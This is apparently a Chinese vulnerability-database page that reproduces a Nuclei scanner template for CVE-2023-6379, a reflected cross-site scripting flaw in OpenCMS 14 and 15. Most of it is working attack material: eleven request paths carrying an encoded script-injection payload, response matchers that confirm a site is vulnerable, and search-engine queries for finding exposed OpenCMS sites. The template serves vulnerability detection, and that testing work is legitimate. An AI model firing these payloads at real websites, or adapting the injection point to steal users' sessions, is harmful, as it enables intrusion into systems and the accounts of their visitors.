CVE-2023-6379: OpenCMS 14 & 15 - Cross Site Scripting

日期: 2025-08-01 | 影响软件: OpenCMS | POC: 已公开

漏洞描述

Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.

PoC代码[已公开]

id: CVE-2023-6379

info:
  name: OpenCMS 14 & 15 - Cross Site Scripting
  author: msegoviag
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
  remediation: |
    Update to version OpenCMS 16
  reference:
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6379
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/msegoviag/msegoviag
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6379
    cwe-id: CWE-79
    epss-score: 0.18616
    epss-percentile: 0.95037
    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 11
    vendor: alkacon
    product: opencms
    shodan-query:
      - title:"opencms"
      - http.title:"opencms"
      - cpe:"cpe:2.3:a:alkacon:opencms"
      - /opencms/
    fofa-query: title="opencms"
    google-query: intitle:"opencms"
  tags: cve2023,cve,opencms,xss,alkacon

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
        - '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>" />'
          - 'OpenCms'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ef017bb32e1ffb67bb0305c8cd63cfa8cd0d60f5f87a3b6d1bb7df35a9699ddd022100c4c32e64255f644138031adeaecd2a57e27f568340bd39b587a2aa58a4912b4c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-6379.yaml

相关漏洞推荐